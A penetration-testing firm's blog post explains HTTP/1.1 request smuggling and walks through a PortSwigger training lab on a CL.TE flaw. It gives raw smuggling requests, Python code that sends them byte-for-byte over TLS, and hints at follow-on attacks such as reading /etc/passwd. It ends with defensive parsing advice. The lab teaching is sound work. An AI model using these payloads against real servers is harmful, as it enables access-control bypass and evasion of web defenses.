Though I’m one of the resident web application penetration testing SMEs (subject matter experts) here at NetWorks Group, I also get to take part in our social engineering / physical penetration testing engagements. Odd-sounding name aside, these engagements are meant to test whether or not the organization in question has adequate defenses in place to stop a would-be threat actor from gaining physical access to offices, headquarters, branches or other locations. Sticking with the fun terminology, a technique I often employ is called “tailgating.”

In this post, I’ll talk about tailgating in both the physical and virtual sense, share an unsettling vulnerability that makes digital tailgating possible, and give a demo of how you can try the technique for yourself.

What’s Tailgating?

“Tailgating” in the non-football sense refers to following someone closely in order to walk through a door that they have already opened. My Cleveland Browns are off to a less-than-stellar start this season, so the tailgating I do for work has been more exciting this year anyway. Think about it — have you ever held the door at work for a co-worker? Do you hold the door only for people you know? Have you ever held the door of your office open for a delivery driver? A construction worker? Someone else? Penetration testers like myself know that in the absence of an RFID badge or physical key, we can often leverage the kindness of strangers to gain unauthorized access. Let’s come back to this in a bit…

These good bois put the “tail” in tailgating.

Def Con 33

This August, I had the privilege of attending the world’s largest hacker conference, Def Con, in Las Vegas, Nevada. It’s one of the highlights of every year for me, and this year was no different. Def Con is known for its many meetups, parties, and of course, cybersecurity presentations, and as per usual, I took part in all of the above. This year, one of the most interesting Def Con revelations for web application security enthusiasts is that HTTP/1.1 must die.

HTTP/1.1 Must Die

In a presentation with this ominous title, PortSwigger’s Director of Research, James Kettle, described the flaws built into HTTP/1.1. Like many of the web’s older protocols, it was designed without anticipating the creative ways attackers would find to abuse it.

Desynchronization...Digital Tailgating?



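HTTP/1.1's fatal flaw is that the boundaries between requests are weak: nothing explicitly marks where one request ends and the next begins. HTTP works using a request-and-response pattern. Each HTTP request consists of a request line (method, path, and protocol version), a set of headers, a blank line, and an optional body.

Because there is no required terminator after the request body, such as an END keyword or a “;”, and a body isn’t required at all, servers rely on the Content-Length and Transfer-Encoding headers to determine where a request ends. Content-Length gives the body’s size in bytes. Transfer-Encoding: chunked instead sends the body as a series of chunks, each prefixed with its size in hexadecimal, and marks the end of the body with a zero-length chunk.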

But what happens if both headers are present and they contradict each other? When the front-end server and the back-end server parse these headers differently, an attacker can take advantage of the discrepancy to hide a second, malicious request inside the body of the first. This is known as HTTP Request Smuggling.

Think of the tailgating example from earlier: request smuggling is like tailgating, except that instead of sneaking in physically, we’re sneaking additional HTTP requests to a web server. The smuggled request “tailgates” the legitimate one. This works because in modern web applications, requests are often proxied through load balancers, Content Delivery Networks (CDNs), and other “stops” on the way to their final destination. If two of those stops disagree about where a request ends, they fall out of sync about where every following request begins. This is known as HTTP Request Desynchronization, or DeSync. An attacker can embed a malicious payload in the smuggled, secondary request, which can lead to injection attacks, authorization bypass, server-side request forgery (SSRF), and more. Because the front end never treats the smuggled request as a request of its own, it can also be used to evade web application firewalls, input sanitization, and other defenses put in place to protect web applications from malicious activity.
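To make the disagreement concrete, here is a minimal Python sketch of the two framing rules. The helper names `frame_by_content_length` and `frame_by_chunked` are hypothetical, and real servers handle far more edge cases (chunk extensions, trailers, malformed input) than this does. Each function takes the bytes that follow the header block and returns the body plus whatever is left over, which a server on a reused connection would treat as the start of the next request.

```python
def frame_by_content_length(data: bytes, content_length: int) -> tuple[bytes, bytes]:
    """Body is exactly content_length bytes; anything after it belongs to the next request."""
    return data[:content_length], data[content_length:]


def frame_by_chunked(data: bytes) -> tuple[bytes, bytes]:
    """Decode a chunked body; the zero-length chunk marks the end of the request.

    Raises ValueError on incomplete or malformed input (bytes.index and int() both do).
    """
    body = b""
    pos = 0
    while True:
        line_end = data.index(b"\r\n", pos)                 # chunk-size line ends with CRLF
        size = int(data[pos:line_end].split(b";")[0], 16)   # size is hex; ignore extensions
        pos = line_end + 2
        if size == 0:
            # Last chunk: expect the empty line that closes the (empty) trailer section.
            if data[pos:pos + 2] != b"\r\n":
                raise ValueError("trailers are not supported in this sketch")
            return body, data[pos + 2:]
        body += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data must be followed by CRLF")
        pos += 2


# The same body bytes, read by two servers that trust different headers
# (imagine a request carrying both Content-Length: 4 and Transfer-Encoding: chunked).
raw_body = b"5\r\nhello\r\n0\r\n\r\n"
print(frame_by_content_length(raw_body, 4))  # (b'5\r\nh', b'ello\r\n0\r\n\r\n')
print(frame_by_chunked(raw_body))            # (b'hello', b'')
```

The two parsers disagree on both the body and the leftover bytes. That disagreement is the desync: whatever one server considers “left over” is what ends up tailgating the next request.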

Example Demo

The fine folks at PortSwigger Web Security Academy have put together a simple lab where you can try your hand at HTTP request smuggling by exploiting a Content-Length/Transfer-Encoding (CL.TE) vulnerability. All you need is a (free) account and Burp Suite Community Edition or a similar HTTP interception proxy.

The lab presents users with a simple website that allows the user to read blog entries.





When you capture a request for the page using an interception proxy (like PortSwigger’s Burp Suite, which I’ll be using), you can examine the content of the request “under the hood.” If we open the HTTP history on the Proxy tab, we can take a look at the initial request to the root page:

Preparing the Request





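In order to test for the CL.TE vulnerability, we’ll need to modify this request. We’ll start by downgrading it from HTTP/2 to HTTP/1.1, since HTTP/2 frames messages itself and the Content-Length/Transfer-Encoding ambiguity this lab relies on only exists in HTTP/1.1 messages. To do this, we’ll first right-click the request and send it to the Repeater tab.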

Next, we’ll open the “Request Attributes” drop-down in the Inspector panel, which is located on the right side of the Repeater tab. Here, we can use the HTTP/1 button to downgrade the request to HTTP/1.1.

Next, we right-click over the request in Repeater and select “Change Request Method.” Note that the GET on line one has been changed to POST, and that additional headers have been added to the request.



Next, we select the settings icon at the top of Repeater and uncheck the “Update Content-Length” option. This option automatically updates the Content-Length header to match the length of the request body. However, since we’re looking to exploit the way this header is parsed by the front-end and back-end servers, we want to disable this feature for now.





Then we remove the excess request headers: everything between the Host header and the Content-Type header.

Before:

After:



Next, to make the vulnerability easier to understand, we’ll configure Repeater to show all non-printable characters. The carriage-return/line-feed pair (\r\n) marks the end of each line, and the pair takes up 2 bytes. Since the Content-Length value is measured in bytes, it’s helpful to see these characters on screen when calculating the Content-Length.
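Counting bytes by hand is where most mistakes happen. A quick way to double-check a Content-Length value is to let Python count the encoded body, with every line break written out as `\r\n`. The bodies below are the ones used in this walkthrough; `content_length` is just a hypothetical helper name.

```python
def content_length(body: str) -> int:
    """Content-Length counts bytes, so encode first; each CRLF contributes 2 bytes."""
    return len(body.encode("ascii"))


# Each \r\n is written explicitly, as Repeater shows it with non-printable characters on.
print(content_length("3\r\nabc"))        # 6: '3' + CRLF + 'abc'
print(content_length("3\r\nabc\r\nX"))   # 9: the full body of the test request
print(content_length("0\r\n\r\nG"))      # 6: the full body of the attack request
print(content_length("foo=bar"))         # 7: the normal request's placeholder body
```

The first two lines show why the test request works: a Content-Length of 6 stops right after `abc`, three bytes short of the full 9-byte body. With “Update Content-Length” left enabled, Burp would presumably set the header to 9 and the discrepancy would disappear.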

Before:

After:

Confirming the Vulnerability



Next, we’ll add in a simple payload to test for the existence of the CL.TE vulnerability. Change the request so that it looks like this (be sure to update the Host header with the unique ID in the URL bar):

POST / HTTP/1.1
Host: {YOUR-UNIQUE-LAB-ID}.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

3
abc
X
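If you would rather script this test than use Repeater, the request can be sent byte-for-byte with Python’s standard library. This is a sketch under a few assumptions: the lab is reached over TLS on port 443, the hostname you pass is your own lab ID, and `build_cl_te_probe` and `send_raw` are hypothetical helper names. Because no ALPN protocols are offered during the TLS handshake, the server cannot negotiate HTTP/2, so the request stays HTTP/1.1 just as it does after the downgrade in Repeater.

```python
import socket
import ssl
from typing import Optional


def build_cl_te_probe(host: str) -> bytes:
    """Build the CL.TE detection request above, writing every CRLF explicitly."""
    body = b"3\r\nabc\r\nX"                  # 9 bytes in total
    head = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 6\r\n"              # deliberately covers only '3\r\nabc'
        "Transfer-Encoding: chunked\r\n"
        "\r\n"                               # empty line ends the header block
    )
    return head.encode("ascii") + body


def send_raw(host: str, payload: bytes, timeout: float = 10.0) -> Optional[bytes]:
    """Send payload unmodified over TLS on port 443.

    Returns the first chunk of the response, or None if nothing arrives
    before the timeout.
    """
    context = ssl.create_default_context()
    with socket.create_connection((host, 443), timeout=timeout) as sock:
        # No ALPN is configured on the context, so HTTP/2 cannot be negotiated.
        with context.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(payload)
            try:
                return tls.recv(4096)
            except socket.timeout:
                return None
```

Usage: `send_raw(host, build_cl_te_probe(host))` with your lab hostname as `host`. Depending on how the front end handles a stalled back end, you may get `None` or a delayed error response rather than a prompt reply; in either case, the delay is the signal.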



Sending the request will result in a timeout error. The front-end server honors the Content-Length value: it counts 6 bytes and ends the request after line 8 (abc), so the rest of the request is never forwarded. The back-end server, however, honors the Transfer-Encoding header’s chunked value. After reading the 3-byte chunk abc, it waits for the next “chunk” of data on line 9. Since that portion of the request was dropped earlier in the chain, the back end times out waiting for data that isn’t coming.
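The timeout can be reproduced offline with a toy model. The sketch below is an illustration, not how either lab server is actually implemented, and both function names are hypothetical: it forwards only Content-Length bytes, as the front end does, then runs an incremental chunked parser over what arrives, as the back end does. The parser reports that it still needs more data, which on a real connection means waiting until the timeout fires.

```python
from typing import Optional


def front_end_forward(body: bytes, content_length: int) -> bytes:
    """Front end honors Content-Length: it forwards exactly that many body bytes."""
    return body[:content_length]


def back_end_chunked_body(received: bytes) -> Optional[bytes]:
    """Back end honors Transfer-Encoding: chunked.

    Returns the decoded body once the zero-length chunk and its empty line have
    arrived, or None if more bytes are still needed (a real server keeps waiting).
    Trailers and CRLF validation are left out of this sketch.
    """
    body = b""
    pos = 0
    while True:
        line_end = received.find(b"\r\n", pos)
        if line_end == -1:
            return None                      # chunk-size line not complete yet
        size = int(received[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            return body if received[pos:pos + 2] == b"\r\n" else None
        if len(received) < pos + size + 2:
            return None                      # chunk data or its CRLF still missing
        body += received[pos:pos + size]
        pos += size + 2                      # skip the chunk data and its CRLF


forwarded = front_end_forward(b"3\r\nabc\r\nX", 6)
print(forwarded)                         # b'3\r\nabc'
print(back_end_chunked_body(forwarded))  # None
```

A `None` here corresponds to the back end sitting on an open connection waiting for line 9, which is exactly the timeout seen in Repeater.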

We’ve shown that the front-end and back-end servers honor different headers. A CL.TE vulnerability appears to be present, and it’s likely that HTTP request smuggling can be achieved.

Now that we’ve done our recon, it’s time to craft an initial attack payload. We are going to attempt to smuggle a “G” character to the front of a subsequent request. To do this, we’ll need to craft two new requests in Burp Suite Repeater. We’ll call the first one “Attack Request” and the second one “Normal Request.”

Tip: You can rename tabs in Burp Suite Repeater by right-clicking on them and selecting “Rename tab.”



Attack Request

We’ll once again send the initial request for the web page root to Repeater and go through the previous steps: downgrading to HTTP/1.1, changing the request method to POST, removing all of the headers between Host and Content-Type, and displaying all non-printable characters.

This time, after the blank line (\r\n) that ends the headers, the body starts with a 0 followed by an empty line. A zero-length chunk followed by an empty line is how chunked encoding marks the end of a body, so this signals to the back-end server, which honors the Transfer-Encoding: chunked header, that the request has ended. After the empty line, we put a “G” character. Your attack request should look like this:

Note: If you’re having trouble, the PortSwigger lab page will provide a request for you to copy under the “Solution” drop-down. I’ve pasted it for you here:

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G
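It is worth checking why `Content-Length: 6` is the right value here. In the toy model below (an illustration with a hypothetical `split_attack_body` helper, not real server code), the front end counts 6 bytes and therefore forwards the entire body, including the “G”. A back end reading chunked encoding stops at the zero-length chunk and leaves the “G” unread on the connection.

```python
ATTACK_BODY = b"0\r\n\r\nG"
LAST_CHUNK = b"0\r\n\r\n"   # zero-length chunk + empty line = end of a chunked body


def split_attack_body(body: bytes, content_length: int) -> tuple[bytes, bytes]:
    """Return (bytes the front end forwards, bytes the back end leaves unread).

    Toy model: the front end trusts Content-Length; the back end trusts
    Transfer-Encoding and stops as soon as it reads the last chunk.
    """
    forwarded = body[:content_length]
    if not forwarded.startswith(LAST_CHUNK):
        raise ValueError("this sketch only models a body that begins with the last chunk")
    leftover = forwarded[len(LAST_CHUNK):]
    return forwarded, leftover


forwarded, leftover = split_attack_body(ATTACK_BODY, 6)
print(len(ATTACK_BODY))  # 6
print(forwarded)         # b'0\r\n\r\nG'
print(leftover)          # b'G'
```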

Don’t send the attack request yet. First, we need to create a “normal request.” We will send the attack request followed shortly by the normal request. If the CL.TE vulnerability is present, the “G” character should be prepended to the normal request.



Normal Request

To craft the normal request, we’ll follow the same routine again: downgrading the request to HTTP/1.1, changing the request method to POST, and removing all headers between the Host header and the Content-Type header. However, we DO NOT need to uncheck the “Update Content-Length” option, and showing the non-printable characters is optional. We then add some test content to the request body. In quality assurance and security testing parlance, “foo=bar” is a common de facto placeholder for request bodies, so that will suffice. Your final “normal request” should look like this:



Launching the Attack

We’re now ready to begin the attack. Start by switching to the Attack Request tab and selecting “Send.” Then switch to the Normal Request tab and select “Send.” The Response panel in Repeater should show a 403 Forbidden response with the error message “Unrecognized Method GPOST.” We’ve successfully smuggled a “G” payload ahead of a POST request.
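The “GPOST” error follows from the back end reading its connection from the front end as one continuous stream of bytes. The toy model below is an illustration under that assumption, not the lab’s actual code, and `normal_request` and `method_seen_by_back_end` are hypothetical helpers. The leftover “G” is still sitting in the back end’s buffer when the normal request arrives on the same reused connection, so the request line it parses begins with `GPOST`.

```python
LEFTOVER = b"G"  # left unread on the back-end connection by the attack request


def normal_request(host: str) -> bytes:
    """The 'Normal Request' tab's contents, with Content-Length computed automatically."""
    body = b"foo=bar"
    head = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def method_seen_by_back_end(connection_buffer: bytes) -> str:
    """The method is everything on the first line before the first space."""
    request_line = connection_buffer.split(b"\r\n", 1)[0]
    return request_line.split(b" ", 1)[0].decode("ascii")


buffer = LEFTOVER + normal_request("YOUR-LAB-ID.web-security-academy.net")
print(buffer.split(b"\r\n", 1)[0])      # b'GPOST / HTTP/1.1'
print(method_seen_by_back_end(buffer))  # GPOST
```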

From here, an attacker could experiment with more malicious payloads. What other types of data could “tailgate” subsequent requests using this vulnerability? Instead of just a “G,” could we use request smuggling to send a GET request for /etc/passwd or other files on the back-end server? Could we send a POST request to update a resource that was forbidden when we requested it from the front-end server?

It’s important to assess the risk of a vulnerability by both its exploitability AND its impact. While exploiting this vulnerability requires only an interception proxy and some crafty payloads, the impact depends on the application and on what types of requests the back-end server responds to. Only a high-quality web application penetration test like the ones we offer here at NWG will help you determine what the actual risk is.

What’s the Endgame?

Unfortunately, previous attempts at mitigation have proven insufficient. The only surefire mitigation is to disable support for HTTP/1.1. Organizations will need a roadmap and plan for deprecating HTTP/1.1 across their attack surface. Additionally, upstream connections (from front-end servers to back-end servers) also need to use HTTP/2. Vendors and B2B partners may be slow to make this change, making it more difficult for organizations to fully protect themselves from these attacks. Where HTTP/1.1 must be supported temporarily, organizations will need to enforce strict parsing rules in their existing environments to mitigate as many attacks as possible.
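As one illustration of “strict parsing rules,” here is a hedged sketch of a front-end check that refuses ambiguous framing instead of guessing. It follows the spirit of RFC 9112, which treats a request carrying both Content-Length and Transfer-Encoding as a likely smuggling attempt and allows servers to reject it. The `check_framing` name and the exact rule set are assumptions for illustration, not a complete defense and not the approach proposed in the research.

```python
import re

DIGITS = re.compile(r"[0-9]+")


def check_framing(headers: list[tuple[str, str]]) -> str:
    """Decide how a request body is framed, refusing anything ambiguous.

    Returns "chunked", "content-length" or "none"; raises ValueError for
    requests a strict front end should reject (e.g. with 400 Bad Request).
    """
    # A name with surrounding whitespace (e.g. from "Transfer-Encoding : chunked")
    # is a classic way to make two parsers disagree, so reject it outright.
    for name, _ in headers:
        if name != name.strip():
            raise ValueError(f"whitespace in header name: {name!r}")

    cl = [v.strip() for n, v in headers if n.lower() == "content-length"]
    te = [v.strip().lower() for n, v in headers if n.lower() == "transfer-encoding"]

    if cl and te:
        raise ValueError("both Content-Length and Transfer-Encoding present")
    if te:
        # Accept only a single, exact "chunked"; variants such as "xchunked"
        # or "chunked, identity" are where parsers tend to disagree.
        if te != ["chunked"]:
            raise ValueError(f"unsupported Transfer-Encoding: {te}")
        return "chunked"
    if cl:
        # Exactly one Content-Length made only of ASCII digits (no "+6", no "6, 7").
        if len(cl) != 1 or not DIGITS.fullmatch(cl[0]):
            raise ValueError(f"invalid Content-Length: {cl}")
        return "content-length"
    return "none"


attack_headers = [("Content-Length", "6"), ("Transfer-Encoding", "chunked")]
try:
    check_framing(attack_headers)
except ValueError as err:
    print("rejected:", err)  # rejected: both Content-Length and Transfer-Encoding present
```

Rejecting outright, rather than picking one header and stripping the other, keeps the front end from ever forwarding a message that a differently configured back end might read another way.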

For more information on the HTTP/1.1 vulnerabilities, check out the presentation from Def Con 33 along with the accompanying blog and website. TryHackMe and PortSwigger have also created rooms and labs where you can try out HTTP Request Smuggling and DeSync attacks on your own.

Thank you to Jarno Timmermans, whose walkthrough of the PortSwigger lab was helpful in writing this blog post.

TryHackMe Room (Premium Subscription Required) - https://tryhackme.com/room/requestsmugglingbrowserdesync

PortSwigger: HTTP/1.1 Must Die - https://portswigger.net/research/http1-must-die#the-desync-endgame

HTTP/1.1 Must Die - https://http1mustdie.com/

PortSwigger Labs: HTTP request smuggling, basic CL.TE vulnerability - https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

Published By: Josh Gatka, Penetration Tester, NetWorks Group

Publish Date: October 9, 2025